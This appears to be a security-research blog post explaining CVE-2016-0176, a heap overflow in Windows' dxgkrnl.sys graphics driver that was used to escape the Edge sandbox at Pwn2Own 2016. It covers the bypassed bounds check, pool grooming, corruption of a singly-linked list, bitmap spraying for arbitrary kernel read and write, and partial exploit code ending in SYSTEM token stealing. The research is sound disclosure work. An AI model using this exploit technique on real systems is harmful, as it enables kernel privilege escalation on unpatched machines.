2016-11-18

A Link to System Privilege

A Detailed Description of CVE-2016-0176 and Its Exploitation

Essentials of a Successful Pwn of Microsoft Edge

A successful Pwn of Microsoft Edge consists of two essential parts: Browser RCE(Remote Code Execution) and browser sandbox bypass. Browser RCE is typically achieved by exploiting a Javascript vulnerability, while browser sandbox bypass can be achieved in different ways, logical sandbox escape or EoP(Escalation of Privilege) through kernel vulnerabilities.

Sandbox of Microsoft Edge is built upon the access check mechanism. In Windows operating system, resources are shared in system-wide range, for example, a file or device can be shared across different processes. Some resources contain sensitive informations, some others are critical to the whole system’s well-functioning, corruptions of those resources will crash the whole system. For those reasons, there should be strict checks when a process want to access a specific resource, this is called access check. When a resource is opened, token of the subject process will be checked against security descriptor of the object resource. Access check consists of several elementary checks in different dimensions, such as ownership and group membership check, privileges check, integrity level and trust level check, capabilities check, etc. The previous generation sandbox is based on integrity level check, where the sandboxed application runs in low integrity level, thus it can not access resources protected by medium or higher integrity level. Microsoft Edge adopts new generation sandbox based on AppContainer, where additional capabilities check will be conducted when accessing resources, besides basic integrity level check. For more details about access check mechanism, refer to my talk at ZeroNights 2015: Did You Get Your Token?

The most common approach of a sandbox bypass is EoP though kernel vulnerabilities, with DKOM(Direct Kernel Object Manipulation) on token objects.

CVE-2016-0176

This vulnerability is in dxgkrnl.sys driver, and it is a heap overflow vulnerability.

The data structure that has been abused is shown as below:

typedef struct _D3DKMT_PRESENTHISTORYTOKEN
{
    D3DKMT_PRESENT_MODEL  Model; //D3DKMT_PM_REDIRECTED_FLIP      = 2,
    UINT                  TokenSize; // 0x438
    UINT64                CompositionBindingId;

    union
    {
        D3DKMT_FLIPMODEL_PRESENTHISTORYTOKEN        Flip;
        D3DKMT_BLTMODEL_PRESENTHISTORYTOKEN         Blt;
        D3DKMT_VISTABLTMODEL_PRESENTHISTORYTOKEN    VistaBlt;
        D3DKMT_GDIMODEL_PRESENTHISTORYTOKEN         Gdi;
        D3DKMT_FENCE_PRESENTHISTORYTOKEN            Fence;
        D3DKMT_GDIMODEL_SYSMEM_PRESENTHISTORYTOKEN  GdiSysMem;
        D3DKMT_COMPOSITION_PRESENTHISTORYTOKEN      Composition;
    }
    Token;
} D3DKMT_PRESENTHISTORYTOKEN;

I will use “history token” as alias of this structure, there are some prerequisites for this vulnerability in this structure:

Model member should be set to D3DKMT_PM_REDIRECTED_FLIP;
TokenSize member should be set to 0x438;

You may already guessed that the vulnerability is in the Token.Flip member, whose type is shown as below:

typedef struct _D3DKMT_FLIPMODEL_PRESENTHISTORYTOKEN
{
    UINT64                                     FenceValue;
    ULONG64                                    hLogicalSurface;
    UINT_PTR                                   dxgContext;
    D3DDDI_VIDEO_PRESENT_SOURCE_ID             VidPnSourceId;

    ……
 
    D3DKMT_DIRTYREGIONS                        DirtyRegions;
} D3DKMT_FLIPMODEL_PRESENTHISTORYTOKEN;

Keep diving into the last member DirtyRegions:

typedef struct tagRECT
{
    LONG    left;
    LONG    top;
    LONG    right;
    LONG    bottom;
} RECT, *PRECT, NEAR *NPRECT, FAR *LPRECT; // 0x10 bytes

typedef struct _D3DKMT_DIRTYREGIONS
{
    UINT  NumRects;

    RECT  Rects[D3DKMT_MAX_PRESENT_HISTORY_RECTS]; // 0x10 * 0x10 = 0x100 bytes

     //#define D3DKMT_MAX_PRESENT_HISTORY_RECTS 16

} D3DKMT_DIRTYREGIONS;

Now we reach to the primitive level, there is a DWORD member NumRects, and an array of RECT structures as Rects, this array is fixed-sized to 16 elements, each element is 0x10 bytes, so the size of Rects is 0x100 bytes.

Layout of Abused structures

This graph above shows the relationship and layout of abused data structures, the left column is the data structure that we prepared in user-mode and passed to kernel-mode drivers by calling Win32 API D3DKMTPresent, the middle column is the data structure that dxgkrnl.sys driver received and maintained, it is copied out from the user-mode buffer, the right column is the embedded union member Token.Flip, a very important feature of this union member is that it is the largest member in the union, we know that the size of a union is determined by its largest member, so the content of Token.Flip stretches to the end of the history token structure. This layout simplifies the exploitation to a large extent.

With the knowledge of the abused data structures, it will be easy to understand the vulnerability, below is the disassembly code snippet that cause the overflow:

loc_1C009832A: DXGCONTEXT::SubmitPresentHistoryToken(......) + 0x67B
        cmp     dword ptr[r15 + 334h], 10h // NumRects
        jbe     short loc_1C009834B; Jump if Below or Equal(CF = 1 | ZF = 1)
        call    cs : __imp_WdLogNewEntry5_WdAssertion
        mov     rcx, rax
        mov     qword ptr[rax + 18h], 38h
        call    cs : __imp_WdLogEvent5_WdAssertion

loc_1C009834B: DXGCONTEXT::SubmitPresentHistoryToken (......) + 0x6B2
        mov     eax, [r15 + 334h]
        shl     eax, 4
        add     eax, 338h
        jmp     short loc_1C00983BD

loc_1C00983BD: DXGCONTEXT::SubmitPresentHistoryToken (......) + 0x6A5
        lea     r8d, [rax + 7]
        mov     rdx, r15; Src
        mov     eax, 0FFFFFFF8h;
        mov     rcx, rsi; Dst
        and     r8, rax; Size
        call    memmove

The r15 register is pointing to the buffer of history token at the entry of this piece of code. It first picks out the DWORD at 0x334 offset and compare it with 0x10, we already know that this DWORD is the Token.Flip.NumRects field, so it is checking if this field exceeds the capacity of the embedded array Token.Flip.Rects. If you are doing code auditing, and you see this check, you may feel frustrated and soliloquize that Microsoft already realized the potential problem here and done some check. But when you move forward, you will see after this check the code logs this abnormal behavior to the watch dog driver with assertion logic, and either branches initiated from this comparison will flow into the same code block at loc_1C009834B. Then you may think that the watch dog driver will invoke the bug check logic in case of overflow, but nothing happened actually. No matter what the value is in Token.Flip.NumRects field, the code flow will reach the block at loc_1C009834B, this block first does some arithmatic calculation based on the Token.Flip.NumRects field and then use it as the size of a memcpy operation.

I rewrite this piece of disassembly code to C++ code as below:

D3DKMT_PRESENTHISTORYTOKEN* hist_token_src = BufferPassedFromUserMode(…);
D3DKMT_PRESENTHISTORYTOKEN* hist_token_dst = ExpInterlockedPopEntrySList(…);

if(hist_token_src->dirty_regions.NumRects > 0x10)
{
    // log via watch dog assertion, NOT work in free/release build
}

auto size = (hist_token_src->dirty_regions.NumRects * 0x10 + 0x338 + 7) / 8;
auto src = (uint8_t*)hist_token_src;
auto dst = (uint8_t*)hist_token_dst;
memcpy(dst, src, size);

Things become clear in C++ codes, no matter what the Token.Flip.NumRects is, dxgkrnl.sys driver will do a memcpy operation, the source buffer of this memcpy is the buffer we passed from user-mode by calling Win32 API D3DKMTPresent function, the destination of this memcpy is a piece of buffer allocated from kernel-mode pool by ExpInterlockedPopEntrySList, the size of this memcpy is calculated by adding the array size of Token.Flip.NumRects elements with the buffer size before this array. If we pass a value larger than 0x10 in Token.Flip.NumRects field in the user-mode buffer, then an overflow to kernel-mode paged pool will occur, we can control the size of the overflow, as well as the first 0x38 bytes content of this overflow. (0x38 more bytes can be set after the end of history token, check the layout graph for more details.)

This vulnerability is interesting, because Microsoft already foresee it but fail to prevent it. The lesson is do not fully trust some best practices unless you know it very well, such as assertion mechanism.

Exploitation

For exploitation of a heap overflow, the layout of the destination buffer is very important. We already know that the destination buffer is allocated from kernel-mode paged pool with ExpInterlockedPopEntrySList function.

With a little debugging work, we can get some basic information about the destination buffer.

kd> u rip-6 L2
dxgkrnl!DXGCONTEXT::SubmitPresentHistoryToken+0x47b:
fffff801`cedb80fb call    qword ptr [dxgkrnl!_imp_ExpInterlockedPopEntrySList (fffff801`ced77338)]
fffff801`cedb8101 test    rax,rax
kd> !pool rax
Pool page ffffc0012764c5a0 region is Paged pool
*ffffc0012764b000 : large page allocation, tag is DxgK, size is 0x2290 bytes
    Pooltag DxgK : Vista display driver support, Binary : dxgkrnl.sys

It is a large buffer in 0x2290 bytes, as its size is larger than 1 page(a page is 0x1000 bytes), it will be allocated as large page allocation. In this case, 3 continuous pages will be consumed to serve this allocation request. The extra bytes after 0x2290 offset will be reclaimed and linked back to free list of paged pool, while an extra separating pool entry tagged as “Frag” will be added between them. For more information about Windows kernel pool layout and large page allocation, please refer to Kernel Pool Exploitation on Windows 7. Below is how it looks at the 0x2290 offset:

kd> db ffffc0012764b000+0x2290 L40
ffffc001`2764d290  00 01 02 03 46 72 61 67-00 00 00 00 00 00 00 00  ....Frag........
ffffc001`2764d2a0  90 22 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ."..............
ffffc001`2764d2b0  02 01 01 00 46 72 65 65-0b 43 44 9e f1 81 a8 47  ....Free.CD....G
ffffc001`2764d2c0  01 01 04 03 4e 74 46 73-c0 32 42 3a 00 e0 ff ff  ....NtFs.2B:....

It is DXGPRESENTHISTORYTOKENQUEUE::GrowPresentHistoryBuffer who is responsible for allocating and managing history tokens as a singly-linked list. Each history token is 0x438 bytes in size, and extend to 0x450 bytes by counting pool header and padding bytes in; The large page allocation is divided into 8 history tokens, linked in reverse order to form the singly-linked list. Dxgkrnl.sys driver intends to use this slist as look-aside list for serving the allocation requests of history token.

This singly-linked list looks as below initially:

Singly-Linked List of History Tokens

The singly-linked list looks as below after serving 1 history token allocation request:

Singly-Linked List After 1 Pop

The singly-linked list looks as below after serving 2 history token allocation request:

Singly-Linked List After 2 Pop

With knowledge of the memory layout of destination buffer of the heap overflow, we have 2 ideas about exploitation:

Idea 1. Overflow the buffer after 0x2290 offset, where maybe reused by some small allocations from paged pool:

Overflow Scenario 1

Idea 2. Overflow the adjacent history token’s header, which may abuse the singly-linked list:

Overflow Scenario 2

The first exploitation idea has some limitations, recall that we can control only 0x38 bytes of the overflowed content, it means we can almost control nothing but the padding bytes, separating frag pool entry and the following pool entry’s header.

The second exploitation idea seems promising, although now Windows kernel is enforcing strict validation for doubly-linked list, but no checks for singly-linked list, we can play the redirecting tricks for singly-linked list.

Let’s do some thought experiments just like Einstein for idea 2. In the above graphs, we see that after poping 2 history tokens out of the slist, we can overflow node B and overwriting the header of node A. Then we push node B back to the slist:

Overwriting Node A's header

What happens after we push node A back to the slist, will it redirect next pointer to the overwritten QWORD?

Redirect Impossible

Actually this will never happen, because while we pushing node A back to slist, the overwritten QWORD in node A’s header will be recovered to pointing to node B:

Back to Initial State

Then we try another possibility, first get back to where after poping 2 nodes out of slist:

After Poping 2 Nodes

This time we first push node A back to slist:

First Push Node A Back

Then we overflow node B to overwrite node A’s header, because now node A already be reclaimed to slist, and its header will not be recovered any more. Now the slist is broken and redirected to the overwritten QWORD:

Overflow Scenario 3

After this series of thought experiments, it is more promising for exploitation in idea 2, let’s get our hands dirty. It seems that we need to pop and push the slist in random order to trigger the above redirection, at least 2 continuous pops side by side. I did the following tries:

1st Try: Loop calling D3DKMTPresent with overflowing fields set in the buffer.

This time I failed, it turns out looping poping node A out and pushing node A back again, in this case I can only overflow as idea 1. The reason is simple, those D3DKMTPresent API calls are served in turns, so we need to call it simultaneously.

2nd Try: Loop calling D3DKMTPresent with overflowing fields set in the buffer from multiple threads.

This time I failed again, after checking some disassembly codes, I believe
the callstack of D3DKMTPresent is protected by a lock.

After those 2 tries, I start to doubt if the 2 continuous pops are doable, I abandoned this doubt quickly after realizing the complex slist should not be degenerated to 1 element, there should be other callstacks triggering pop of the slist. I wrote a windbg script for logging push and pop operations, and tried launching some graphics intensive applications while doing 2nd try. Then miracle happened, while I playing with the built-in Solitaire games, a double pop happened, I debugged and found out a BitBlt API will trigger poping elements out of the slist from another callstack.

3rd and Last Try: Loop calling D3DKMTPresent with overflowing fields set in the buffer from multiple threads, while loop calling BitBlt from another multiple threads.

It succeeded in redirecting the next pointer in slist, and lead to arbitrary write to kernel-mode memory. But it is still far from perfect, we need to find out the tokens of current and system process, and do token stealing. During this process, more than 1 reads and writes are needed, but the tricks above is not easily repeatable, especially with the strict rules of Pwn2Own 2016 that only 3 tries within 15 minutes, some more tricks is needed.

Some More Tricks

Repeatable arbitrary read and write into kernel-mode memory

I used Win32k bitmap object as intermediate targets, I did it by first spraying lots of bitmap objects into kernel-mode memory, and then guessing their addresses as targets of the redirection write. If I succeeded in hitting one of those bitmap objects, I modify the buffer pointer and size field in it, make it pointing to another bitmap object. So 2 bitmap objects in use, first for controlling the address of read and write, second for doing actual read and write.

Actually I sprayed bitmap objects into 4GB range of memory, I first sprayed 256MB large bitmap objects to reserve continuous and well-aligned pool memory, then I replace them with 1MB small bitmap objects whose address is aligned at 0x100000 boundary, which makes guessing much easier.

Information leakage is needed as a hint for guessing the addresses of sprayed bitmap objects, this is done with the help of user32! gSharedInfo.

Token Stealing

With the ability of repeatably arbitrary read and write, as well as information leakage of nt kernel module base address by sidt, we can easily find the address of nt!PspCidTable, then we can find the _EPROCESS object of current and system process by parsing this table, and get the respective _TOKEN object addresses and finally do the token stealing.

Exploitation Code(parts)

VOID ThPresent(THREAD_HOST * th)
{
    SIZE_T hint = 0;
    while (TRUE)
    {
        HIST_TOKEN ht = { 0, };
        HtInitialize(&ht);

        SIZE_T victim_surf_obj = ThNextGuessedAddr(th, ++hint);

        SIZE_T buffer_ptr = victim_surf_obj + 0x200000 + 0x18;
        th->backupBufferPtr1 = victim_surf_obj + 0x258;
        th->backupBufferPtr2 = victim_surf_obj + 0x200000 + 0x258;

        SIZE_T back_offset = 0x10;

        SURFOBJ surf_obj = { 0, };

        surf_obj.cjBits = 0x80;
        surf_obj.pvBits = (PVOID)buffer_ptr;
        surf_obj.pvScan0 = (PVOID)buffer_ptr;
        surf_obj.sizlBitmap.cx = 0x04;
        surf_obj.sizlBitmap.cy = 0x08;
        surf_obj.iBitmapFormat = 0x06;
        surf_obj.iType = 0;
        surf_obj.fjBitmap = 0x01;
        surf_obj.lDelta = 0x10;

        DWORD dwBuff = 0x04800200;
        HtSetBuffer(&ht, 0x18 + th->memberOffset - back_offset, (unsigned char*)&surf_obj, 0x68);
        HtSetBuffer(&ht, 0x70 + th->memberOffset - back_offset, &dwBuff, sizeof(DWORD));


        if (th->memberOffset - back_offset + 0xE8 < 0x448)
        {
            SIZE_T qwBuff = victim_surf_obj + 0xE0;
            HtSetBuffer(&ht, 0xE0 + th->memberOffset - back_offset, &qwBuff, sizeof(SIZE_T));
            HtSetBuffer(&ht, 0xE8 + th->memberOffset - back_offset, &qwBuff, sizeof(SIZE_T));
        }


        if (th->memberOffset - back_offset + 0x1C0 < 0x448)
        {
            SIZE_T qwBuff = victim_surf_obj + 0x1B8;
            HtSetBuffer(&ht, 0x1B8 + th->memberOffset - back_offset, &qwBuff, sizeof(SIZE_T));
            HtSetBuffer(&ht, 0x1C0 + th->memberOffset - back_offset, &qwBuff, sizeof(SIZE_T));
        }

        HtOverflowNextSListEntry(&ht, victim_surf_obj);
        HtTrigger(&ht);

        if (th->triggered)
            break;
    }
}

VOID ThTrigger(THREAD_HOST * th)
{
    SIZE_T i = 0;
    HANDLE threads[TH_MAX_THREADS] = { 0, };
    unsigned char second_buffer[0x78] = { 0, };

    for (SIZE_T i = 0; i < TH_MAX_THREADS; i++)
    {
        if (th->triggered)
        {
            break;
        }

        if (i == 9)
        {
            DWORD thread_id = 0;
            threads[i] = CreateThread(NULL, 0, ProbeThreadProc, th, 0, &thread_id);
        }
        else if (i % 3 != 0 && i > 0x10)
        {
            DWORD thread_id = 0;
            threads[i] = CreateThread(NULL, 0, PresentThreadProc, th, 0, &thread_id);
        }           
        else
        {
            DWORD thread_id = 0;
            threads[i] = CreateThread(NULL, 0, BitbltThreadProc, th, 0, &thread_id);
        }
    }

    for (i = 0; i < TH_MAX_THREADS; i++)
    {
        if (threads[i] != NULL)
        {
            if (WAIT_OBJECT_0 == WaitForSingleObject(threads[i], INFINITE))
            {
                CloseHandle(threads[i]);
                threads[i] = NULL;
            }
        }
    }

    Log("trigged\n");

    ThRead(th, (const void*)th->backupBufferPtr2, second_buffer, 0x78);

    ADDR_RESOLVER ar = { 0, };
    ArInitialize(&ar, th);

    SIZE_T nt_addr = ArNTBase(&ar); 
    SIZE_T psp_cid_table_addr = nt_addr + PSP_CIDTABLE_OFFSET;
    SIZE_T psp_cid_table_value;

    ThRead(th, psp_cid_table_addr, &psp_cid_table_value, 0x08);

    SIZE_T psp_cid_table[0x0C] = { 0, };
    ThRead(th, psp_cid_table_value, psp_cid_table, 0x60);

    SIZE_T table_code = psp_cid_table[1];
    SIZE_T handle_count = psp_cid_table[0x0B] & 0x00000000ffffffff;

    SIZE_T curr_pid = GetCurrentProcessId();

    do
    {
        ThParseCidTable(th, table_code, handle_count);
        Sleep(1000);
    } while (th->currentEprocess == NULL || th->systemEprocess == NULL);

    SIZE_T curr_proc = th->currentEprocess;
    SIZE_T system_proc = th->systemEprocess;

    SIZE_T system_token = 0;
    ThRead(th, (system_proc + 0x358), &system_token, 0x08);

    SIZE_T curr_token = 0;
    ThRead(th, (curr_proc + 0x358), &curr_token, 0x08);

    ThWrite(th, (curr_proc + 0x358), &system_token, 0x08);

    ThRead(th, (curr_proc + 0x358), &curr_token, 0x08);
    
    ThRestore(th);

    Log("elevated\n");

    Sleep(3600000);

    return;
}

Keen Security Lab Blog